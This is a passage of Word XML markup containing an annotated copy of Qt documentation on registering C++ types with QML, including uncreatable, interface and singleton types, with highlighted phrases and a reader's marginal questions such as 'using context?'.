      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> registers a C++ type that is not instantiable and cannot be referred to from QML. This enables the engine to </w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00B170D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>coerce</w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> any inherited types that are instantiable from QML.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId205" w:anchor="qmlRegisterInterface" w:history="1">
        <w:r w:rsidR="00DA77C2" w:rsidRPr="00B50DBF">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qmlRegisterInterface</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">() registers a Qt interface type with a specific QML type name. </w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="008B0A55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The type is not instantiable from QML but can be referred to by its type name.</w:t>
      </w:r>
      <w:r w:rsidR="00B50DBF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B50DBF" w:rsidRPr="00B50DBF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>using context?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId206" w:anchor="qmlRegisterUncreatableType" w:history="1">
        <w:r w:rsidR="00DA77C2" w:rsidRPr="008B0A55">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qmlRegisterUncreatableType</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="008B0A55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> registers a named C++ type that is not instantiable but should be identifiable as a type to the QML type system. This is useful </w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00B50DBF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if a type's enums or attached properties should be accessible</w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> from QML but the type itself should not be instantiable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00B50DBF" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId207" w:anchor="qmlRegisterSingletonType" w:history="1">
        <w:r w:rsidR="00DA77C2" w:rsidRPr="008B0A55">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qmlRegisterSingletonType</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="008B0A55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> registers a singleton type that can be imported from QML, as discussed below.</w:t>
      </w:r>
      <w:r w:rsidR="00B50DBF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B50DBF" w:rsidRPr="00B50DBF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>using context?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Note that all C++ types registered with the QML type system must be</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId208" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-derived, even if they are non-instantiable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="008B0A55">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="270" w:name="registering-singleton-objects-with-a-sin"/>
      <w:bookmarkStart w:id="271" w:name="_Toc483000589"/>
      <w:bookmarkStart w:id="272" w:name="_Toc483603942"/>
      <w:bookmarkStart w:id="273" w:name="_Toc483605162"/>
      <w:bookmarkEnd w:id="270"/>
      <w:r w:rsidRPr="008B0A55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Registering Singleton Objects with a Singleton Type</w:t>
      </w:r>
      <w:bookmarkEnd w:id="271"/>
      <w:bookmarkEnd w:id="272"/>
      <w:bookmarkEnd w:id="273"/>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B50DBF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A singleton type enables properties, signals and methods to be exposed in a namespace without requiring the client to manually instantiate an object instance.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId209" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">singleton types in particular are an efficient and convenient way </w:t>
      </w:r>
      <w:r w:rsidRPr="00B50DBF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to provide functionality or global property values</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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Note that singleton types </w:t>
      </w:r>
      <w:r w:rsidRPr="00B50DBF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>do not have an associated</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50DBF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId210" w:history="1">
        <w:r w:rsidRPr="008B0A55">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlContext</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008B0A55">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008B0A55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as they are shared across all contexts in an engine</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId211" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">singleton type instances </w:t>
      </w:r>
      <w:r w:rsidRPr="00B50DBF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are constructed and owned by the</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50DBF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId212" w:history="1">
        <w:r w:rsidRPr="00B50DBF">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlEngine</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and will be destroyed when the engine is destroyed.</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A</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId213" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>singleton type can be interacted with in a manner similar to any other</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId214" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">or instantiated type, except that only one (engine constructed and owned) instance will exist, </w:t>
      </w:r>
      <w:r w:rsidRPr="008B0A55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and it must be referenced by type name rather than id. Q_PROPERTYs of</w:t>
      </w:r>
      <w:r w:rsidR="00B50DBF" w:rsidRPr="008B0A55">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId215" w:history="1">
        <w:r w:rsidRPr="008B0A55">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B50DBF" w:rsidRPr="008B0A55">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008B0A55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>singleton types may be bound to, and</w:t>
      </w:r>
      <w:r w:rsidR="00B50DBF" w:rsidRPr="008B0A55">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId216" w:anchor="Q_INVOKABLE" w:history="1">
        <w:r w:rsidRPr="008B0A55">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Q_INVOKABLE</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B50DBF" w:rsidRPr="008B0A55">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008B0A55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>functions of</w:t>
      </w:r>
      <w:r w:rsidR="00B50DBF" w:rsidRPr="008B0A55">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId217" w:history="1">
        <w:r w:rsidRPr="008B0A55">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B50DBF" w:rsidRPr="008B0A55">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008B0A55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module APIs may be used in signal handler expressions. This</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> makes singleton types an </w:t>
      </w:r>
      <w:r w:rsidRPr="00B50DBF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ideal way to implement styling or theming</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and they can also be </w:t>
      </w:r>
      <w:r w:rsidRPr="00B50DBF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>used instead of ".pragma library" script imports</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B50DBF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>store global state or to provide global functionality</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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Once registered, a</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
